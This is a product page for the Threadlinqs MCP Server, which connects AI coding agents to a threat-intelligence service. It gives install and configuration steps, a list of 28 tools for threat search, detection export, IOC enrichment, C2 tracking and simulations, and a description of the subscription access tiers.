Home/ Platform/ MCP Server
Published: March 2026 | Last reviewed: March 22, 2026
// model_context_protocol

Threat Intelligence for AI Agents

The Threadlinqs MCP Server connects AI coding agents directly to live threat intelligence. 28 tools expose threat search, detection export, IOC enrichment, MITRE mapping, C2 tracking, and more through the Model Context Protocol standard.

28
MCP Tools
8
Resource Types
16
Free Tier Tools
20+
API Endpoints

What Is MCP?

The Model Context Protocol is an open standard that lets AI assistants connect to external data sources and tools. Instead of copy-pasting threat intelligence into a chat window, your AI agent calls the Threadlinqs MCP Server directly to search threats, pull detections, enrich IOCs, and map MITRE techniques in real time.

MCP works with Claude Code, Cursor, Windsurf, VS Code Copilot, and any MCP-compatible client. The server runs locally via stdio transport, keeping your API key on your machine.

Installation

One command installs the server. No build step, no Docker, no infrastructure.

TERMINALnpx intelthreadlinqs-mcp

Or add it to your MCP client configuration:

JSON{
  "mcpServers": {
    "threadlinqs-intel": {
      "command": "npx",
      "args": ["-y", "intelthreadlinqs-mcp"],
      "env": {
        "THREADLINQS_API_KEY": "your-api-key-here"
      }
    }
  }
}

16 of 28 tools work on the free tier without an API key. Authenticated users unlock C2 intelligence, advanced correlations, threat simulations, and more.

28 Tools Across 11 Domains

Every tool is typed, documented, and returns structured JSON that AI agents can reason over directly.

Threats (4 tools)

search_threats Full-text search across all tracked threats free
get_threat Full threat report by ID with timeline, IOCs, detections free
get_recent_threats Latest threats added to the platform free
list_threat_categories All threat categories with counts free

Detections (2 tools)

get_detections Detection rules for a specific threat blue
export_detection Export rule in SPL, KQL, or Sigma format blue

IOCs & Enrichment (1 tool)

search_iocs Search indicators of compromise across all threats free

MITRE ATT&CK (2 tools)

get_mitre_coverage Full MITRE technique coverage map free
get_mitre_technique Technique details with linked threats and detections free

C2 Intelligence (7 tools)

list_c2_beacons Active C2 beacon infrastructure red
get_c2_configs Extracted C2 configurations red
get_c2_watermarks Operator watermark tracking red
get_c2_operators Operator cluster fingerprints red
get_c2_timeline Infrastructure timeline events red
get_c2_stats Aggregate C2 statistics red
get_c2_cross_correlations Cross-infrastructure correlation engine red

Simulations, Debriefs & More (12 tools)

get_threat_simulations Attack simulation scripts per threat purple
list_simulations Browse all simulation scenarios purple
list_debriefs Daily intelligence debriefs free
get_debrief Full debrief for a specific date free
get_correlation_engine Advanced cross-threat correlations purple
get_correlations_overview Correlation engine summary stats purple
get_threat_transcripts Structured analysis transcripts free
get_cve_details CVE vulnerability enrichment free
get_cwe_details CWE weakness details free
get_platform_stats Platform-wide aggregate statistics free
get_changelog Platform release changelog free
get_roadmap Upcoming platform features free

Example: Security-Aware Code Review

An AI agent reviewing a pull request can query the MCP server to check whether any IOCs or techniques from recent threats appear in the codebase, then suggest detection rules directly.

AGENT PROMPT"Search for threats related to supply chain attacks,
then get the MITRE techniques for T1195 and show me
detection rules I can deploy to Sentinel."

# The agent calls:
# 1. search_threats({ query: "supply chain" })
# 2. get_mitre_technique({ technique_id: "T1195" })
# 3. export_detection({ id: 42, format: "kql" })

Access Tiers

Tools are gated by subscription tier to match the data sensitivity and compute cost of each operation.

Free / Unverified (16 tools)
Threat search, recent threats, categories, IOC search, MITRE coverage, debriefs, transcripts, CVE/CWE, stats, changelog, roadmap.
Blue Analyst (2 tools)
Detection rule retrieval and export in SPL, KQL, and Sigma formats.
Red Professional (7 tools)
Full C2 intelligence suite: beacons, configs, watermarks, operators, timeline, stats, cross-correlations.
Purple SME (3 tools)
Attack simulations, advanced correlation engine, and correlation overview analytics.
// author
Threadlinqs Intel Team
Security Engineer at Threadlinqs Intelligence. Researching active threats, building detection rules, and mapping adversary tradecraft across SPL, KQL, and Sigma.
medium.com/@hatim.bakkali10

Give your AI agent access to live threat intelligence. Install the MCP server now.

[ npm_install ] view documentation

Explore the Platform

Threat Intelligence
249+ tracked threats with daily intelligence debriefs and CVE enrichment.
Detection Engineering
2,700+ SPL, KQL, and Sigma rules mapped to MITRE ATT&CK.
Attack Simulations
300+ purple team scenarios to validate your detections work.
MITRE ATT&CK Coverage
465 techniques across 14 tactics with gap analysis and drill-down.
Actor Attribution
166 threat actors across 32 nations with operational tradecraft profiles.